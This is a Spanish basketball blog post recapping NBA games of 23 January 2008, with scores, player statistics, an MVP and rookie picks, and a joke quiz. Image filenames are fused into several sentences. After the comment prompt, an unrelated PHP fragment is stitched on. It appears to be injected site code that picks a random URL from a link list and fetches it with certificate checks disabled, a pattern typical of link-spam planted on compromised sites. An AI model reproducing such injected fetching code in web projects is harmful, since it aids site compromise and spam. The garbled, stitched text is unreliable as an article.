La crónica (23/01/08)

24 de January de 2008 por MagicJohnson32

Cambio de líder en la Conferencia Oeste. Ni Suns, ni Spurs, ni Mavs, ni siquiera Lakers, Jazz, Rockets o Nuggets. El mejor equipo de la conferencia más competitiva son los New Orleans Hornets. Pero eso es sólo el titular de lo ocurrido anoche, así que vamos con el resumen, primero en imágenes y después, en palabras:

La de ayer fue una noche de muchos partidos en la NBA. Entre todos los disputados destacaron dos, las derrotas de los líderes de conferencia. Especialmente trascendente resultó la de los Suns por dos motivos: primero, porque cayó ante el peor equipo de la NBA, los Wolves; y segundo, porque a los de Arizona esta derrota les costó el liderato de la conferencia, que ahora pasa a manos de los Hornets (sí, has leído bien, New Orleans lidera el Oeste en estos momentos).calderonthreecelticsLos Suns habrán de replantearse las cosas ya que cada vez que juegan ante un buen interior, éste les destroza, y anoche fue el turno de Al Jefferson con 39 puntos y 15 rebotes. Por su parte, el todavía mejor equipo de la NBA, los Celtics, perdieron en su pista ante los Raptors, dirigidos por un espectacular Calderón que anotó 24 puntos (8 de 10 en tiros), incluyendo una acción de 2+1 decisiva, y repartió 13 asistencias. Otros tres raptors lograron más de 20 puntos, lo que deja claro que los Celtics no defendieron como acostumbran.

El nuevo líder del Oeste se impuso a lossergiopargo Blazers con un sorprendente máximo anotador: ni Chris Paul, ni Chandler, ni West, ni Stojakovic, ni Peterson… Jannero Pargo logró 24 puntos y 5 asistencias, e impulsó a los Hornets al triunfo tras un inicio de dominio de los Blazers. Siguiendo la estela de New Orleans en la SouthWest se mantienen los Mavericks y los Spurs. Devin Harris, Nowitzki y Howard lograron más de 20 puntos en la victoria de los Mavs en Charlotte, mientras que los Spurs vencieron a los Lakers gracias a un 12-31 en el tercer cuarto y a los 28 puntos, 17 rebotes, 4 asistencias y 3 tapones de Duncan. En la misma división SouthWest, los Rockets parecen engancharse al tren de los Playoffs tras ganar de nuevo a los Sonics con Yao dominando las zonas y Alston y McGrady, que jugó lesionado, kevindurantmcgradydecidiendo en los momentos decisivos.

También hay nuevo líder en la división NorthWest, ya que los Nuggets aprovecharon la derrota de los Blazers y se situaron primeros tras ganar a los Hawks con 33 puntos, 31 rebotes y 6 tapones de su pareja interior, Camby y Martin, además de 29 puntos de Iverson y 23 de Kleiza, de nuevo titular por la baja de Carmelo. Josh Smith firmó un gran triple doble, 22-12-10, a lo que añadió 5 tapones y 3 robos aunque con discretos porcentajes y 7 pérdidas.

Detroit alcanzó su trigésima victoria al ganar a los Sixers en un partido típico del Este, y los Bulls contaron, al fin, con la mejor versión de Hinrich, que se fue hasta los 38 puntos, 10 asistencias y 7 rebotes contra los Pacers, y contrarrestó de este modo las ausencias de Deng y Gordon y el gran partido de Granger. Y acabamos con las tres palizas de la noche: la de los Cavaliers sobre los Wizards, con un infalible Ilgauskas (10 de 10 en tiros), la de Orlando sobre Memphis, con Turkoglu como jugador más destacado, y la de los Clippers sobre unos Kings a los que esta vez no les sirvió volver a contar con todos sus efectivos y no pudieron frenar a Kaman (20 puntos, 21 rebotes), Maggette (21-5-4) y Thornton (23-9-4).

Resultados:

Mavs 102 – 95 Bobcats

Pistons 86 – 78 Sixers

Wizards 85 – 121 Cavaliers

Raptors 114 – 112 Celtics

Magic 112 – 85 Grizzlies

Suns 107 – 117 Wolves

Blazerzs 81 – 96 Hornets

Pacers 95 – 108 Bulls

Hawks 100 – 107 Nuggets

Lakers 91 – 103 Spurs

Rockets 109 – 107 Sonics

Kings 85 – 111 Clippers

Nuestro MVP: Nos encantan estas jornadas donde es difícil decidir un MVP. Esta noche no podemos dejar de mencionar el triple doble de Josh Smith, al que sólo le falta mejorar su tiro y sus pérdidas para ser un auténtico súper crack, los 24 puntos (8 de 10), 13 asistencias y canasta ganadora a falta de 10 segundos de José Calderón, el récord de anotación de Altinshinrich Jefferson con 39 puntos a los que ha sumado 15 rebotes para la victoria de los Wolves frente a los todopoderosos Suns, el retorno de un Kirk Hinrich que ha acabado el partido con 38 puntos, 10 asistencias y 7 rebotes, los intentos de Danny Granger (33 puntos, 7 rebotes) por llevarse la victoria, el 20-20 de Chris Kaman, el 10 de 10 en tiros de Ilgauskas… Resulta imposible quedarse con uno solo.

El rookie de la noche: tres rookies merecen nuestra mención. El primero, un Jason Smith que a la chita callando va realizando partidos interesantes como el de hoy: 6 puntos y 8 rebotes en 22 minutos de juego. El segundo, Joakim Noah, que ha jugado 34 minutos y ha sorprendido a todos con 14 puntos y 15 rebotes. Y, por último, el alero de los Clippers Al Thornton, que ha cuajado una sensacion actuación con 23 puntos y 9 rebotes.

La sorpresa: Buenos partidos de Devin Brown y Jannero Pargo respecto a los que están acostumbrados. Muy bueno el de Bargnani (20-7-7), al que le hacía falta una actuación así para coger confianza, y el de Jaric (15-8-10), pero la sorpresa del día, sin duda, ha sido el jugador de los Spurs Ime Udoka, que ha sorprendido a los Lakers con 18 puntos y 5 rebotes.

La decepción: Decepción compartida hoy. La de pareja Jamison & Butler, artífices de increíbles actuaciones otras noches, líderes de su equipo, hoy no han podido pasar de los 12 puntos. 8 de 12 en tiros, 8 rebotes, 3 asistencias en 51 minutos de juego es su estadística conjunta. El resultado: los Wizads han perdido por 26 puntos.

tinsleyhidefosterPasatiempos: ¿Por qué se esconde Jamaal Tinsley?

A) porque le debe dinero a Jeff Foster

B) porque el tipo que disparó a su coche está en la grada

C) porque acaba de ver sus porcentajes de tiro

D) porque Hinrich, que este año no había pasado de 22 puntos, logró la mejor anotación de su carrera con 38 puntos, 14 de 21 en tiros, y 10 asistencias.

Respuesta correcta: D, Hinrich presenta este año los peores promedios desde que llegó a la liga en anotación y asistencias. Sin Deng ni Gordon en pista, los Pacers sólo tenían que frenar a Hinrich, algo que últimamente tampoco parecía tan difícil.

El ganador se llevará la toalla empleada por Tinsley para ocultarse ante semejante vergüenza. Tranquilos que Tinsley ni siquiera sudó, así que la toalla está por estrenar.

Por último, las 10 mejores jugadas de la noche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>